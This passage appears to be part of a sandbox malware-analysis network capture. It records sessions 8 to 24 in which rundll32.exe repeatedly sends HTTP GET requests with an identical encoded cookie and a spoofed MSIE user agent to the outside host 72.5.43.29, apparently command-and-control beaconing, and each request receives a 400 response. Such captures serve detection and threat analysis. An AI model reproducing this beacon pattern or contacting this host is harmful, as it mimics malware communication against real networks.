Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: 72.5.43.29
Connection: Keep-Alive
Cache-Control: no-cache
Aug 15, 2024 05:30:11.870028973 CEST | 223 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/html
Connection: close
Date: Thu, 15 Aug 2024 03:30:11 GMT
Content-Length: 94
Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1></BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49744 | 72.5.43.29 | 80 | 7568 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Aug 15, 2024 05:30:17.878631115 CEST | 393 | OUT | GET / HTTP/1.1
Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: 72.5.43.29
Connection: Keep-Alive
Cache-Control: no-cache
Aug 15, 2024 05:30:18.681452036 CEST | 223 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/html
Connection: close
Date: Thu, 15 Aug 2024 03:30:18 GMT
Content-Length: 94
Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1></BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49746 | 72.5.43.29 | 80 | 7568 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Aug 15, 2024 05:30:22.332113028 CEST | 393 | OUT | GET / HTTP/1.1
Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: 72.5.43.29
Connection: Keep-Alive
Cache-Control: no-cache
Aug 15, 2024 05:30:23.027292967 CEST | 223 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/html
Connection: close
Date: Thu, 15 Aug 2024 03:30:22 GMT
Content-Length: 94
Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1></BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49747 | 72.5.43.29 | 80 | 7568 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Aug 15, 2024 05:30:27.348251104 CEST | 393 | OUT | GET / HTTP/1.1
Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: 72.5.43.29
Connection: Keep-Alive
Cache-Control: no-cache
Aug 15, 2024 05:30:28.034893036 CEST | 223 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/html
Connection: close
Date: Thu, 15 Aug 2024 03:30:27 GMT
Content-Length: 94
Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1></BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49748 | 72.5.43.29 | 80 | 7568 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Aug 15, 2024 05:30:35.004123926 CEST | 393 | OUT | GET / HTTP/1.1
Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: 72.5.43.29
Connection: Keep-Alive
Cache-Control: no-cache
Aug 15, 2024 05:30:35.739840984 CEST | 223 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/html
Connection: close
Date: Thu, 15 Aug 2024 03:30:35 GMT
Content-Length: 94
Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1></BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49749 | 72.5.43.29 | 80 | 7568 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Aug 15, 2024 05:30:42.552580118 CEST | 393 | OUT | GET / HTTP/1.1
Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: 72.5.43.29
Connection: Keep-Alive
Cache-Control: no-cache
Aug 15, 2024 05:30:43.317878962 CEST | 223 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/html
Connection: close
Date: Thu, 15 Aug 2024 03:30:43 GMT
Content-Length: 94
Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1></BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49750 | 72.5.43.29 | 80 | 7568 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Aug 15, 2024 05:30:47.270389080 CEST | 393 | OUT | GET / HTTP/1.1
Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: 72.5.43.29
Connection: Keep-Alive
Cache-Control: no-cache
Aug 15, 2024 05:30:47.982248068 CEST | 223 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/html
Connection: close
Date: Thu, 15 Aug 2024 03:30:47 GMT
Content-Length: 94
Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1></BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 49751 | 72.5.43.29 | 80 | 7568 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Aug 15, 2024 05:30:53.365479946 CEST | 393 | OUT | GET / HTTP/1.1
Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: 72.5.43.29
Connection: Keep-Alive
Cache-Control: no-cache
Aug 15, 2024 05:30:54.186480045 CEST | 223 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/html
Connection: close
Date: Thu, 15 Aug 2024 03:30:54 GMT
Content-Length: 94
Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1></BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 49752 | 72.5.43.29 | 80 | 7568 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Aug 15, 2024 05:30:57.660660028 CEST | 393 | OUT | GET / HTTP/1.1
Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: 72.5.43.29
Connection: Keep-Alive
Cache-Control: no-cache
Aug 15, 2024 05:30:58.502275944 CEST | 223 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/html
Connection: close
Date: Thu, 15 Aug 2024 03:30:58 GMT
Content-Length: 94
Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1></BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 49753 | 72.5.43.29 | 80 | 7568 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Aug 15, 2024 05:31:03.692082882 CEST | 393 | OUT | GET / HTTP/1.1
Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: 72.5.43.29
Connection: Keep-Alive
Cache-Control: no-cache
Aug 15, 2024 05:31:04.396198988 CEST | 223 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/html
Connection: close
Date: Thu, 15 Aug 2024 03:31:04 GMT
Content-Length: 94
Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1></BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 49754 | 72.5.43.29 | 80 | 7568 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Aug 15, 2024 05:31:09.576457977 CEST | 393 | OUT | GET / HTTP/1.1
Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: 72.5.43.29
Connection: Keep-Alive
Cache-Control: no-cache
Aug 15, 2024 05:31:10.262981892 CEST | 223 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/html
Connection: close
Date: Thu, 15 Aug 2024 03:31:10 GMT
Content-Length: 94
Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1></BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 49755 | 72.5.43.29 | 80 | 7568 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Aug 15, 2024 05:31:13.727726936 CEST | 393 | OUT | GET / HTTP/1.1
Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: 72.5.43.29
Connection: Keep-Alive
Cache-Control: no-cache
Aug 15, 2024 05:31:14.442205906 CEST | 223 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/html
Connection: close
Date: Thu, 15 Aug 2024 03:31:14 GMT
Content-Length: 94
Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1></BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 49756 | 72.5.43.29 | 80 | 7568 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Aug 15, 2024 05:31:18.145819902 CEST | 393 | OUT | GET / HTTP/1.1
Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: 72.5.43.29
Connection: Keep-Alive
Cache-Control: no-cache
Aug 15, 2024 05:31:18.832154989 CEST | 223 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/html
Connection: close
Date: Thu, 15 Aug 2024 03:31:18 GMT
Content-Length: 94
Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1></BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 49757 | 72.5.43.29 | 80 | 7568 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Aug 15, 2024 05:31:23.815515041 CEST | 393 | OUT | GET / HTTP/1.1
Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: 72.5.43.29
Connection: Keep-Alive
Cache-Control: no-cache
Aug 15, 2024 05:31:24.486062050 CEST | 223 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/html
Connection: close
Date: Thu, 15 Aug 2024 03:31:24 GMT
Content-Length: 94
Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1></BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 49758 | 72.5.43.29 | 80 | 7568 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Aug 15, 2024 05:31:31.541568995 CEST | 393 | OUT | GET / HTTP/1.1
Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: 72.5.43.29
Connection: Keep-Alive
Cache-Control: no-cache
Aug 15, 2024 05:31:32.238486052 CEST | 223 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/html
Connection: close
Date: Thu, 15 Aug 2024 03:31:32 GMT
Content-Length: 94
Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1></BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.4 | 49759 | 72.5.43.29 | 80 | 7568 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Aug 15, 2024 05:31:35.741480112 CEST | 393 | OUT | GET / HTTP/1.1
Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: 72.5.43.29
Connection: Keep-Alive
Cache-Control: no-cache
Aug 15, 2024 05:31:36.428111076 CEST | 223 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/html
Connection: close
Date: Thu, 15 Aug 2024 03:31:36 GMT
Content-Length: 94
Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1></BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.4 | 49760 | 72.5.43.29 | 80 | 7568 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Aug 15, 2024 05:31:40.152585030 CEST | 393 | OUT | GET / HTTP/1.1
Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: 72.5.43.29
Connection: Keep-Alive
Cache-Control: no-cache
Aug 15, 2024 05:31:40.844693899 CEST | 223 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/html
Connection: close
Date: Thu, 15 Aug 2024 03:31:40 GMT
Content-Length: 94
Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1></BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.4 | 49761 | 72.5.43.29 | 80 | 7568 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Aug 15, 2024 05:31:46.401648998 CEST | 393 | OUT | GET / HTTP/1.1
Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: 72.5.43.29
Connection: Keep-Alive
Cache-Control: no-cache
Aug 15, 2024 05:31:47.087104082 CEST | 223 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/html
Connection: close
Date: Thu, 15 Aug 2024 03:31:46 GMT
Content-Length: 94
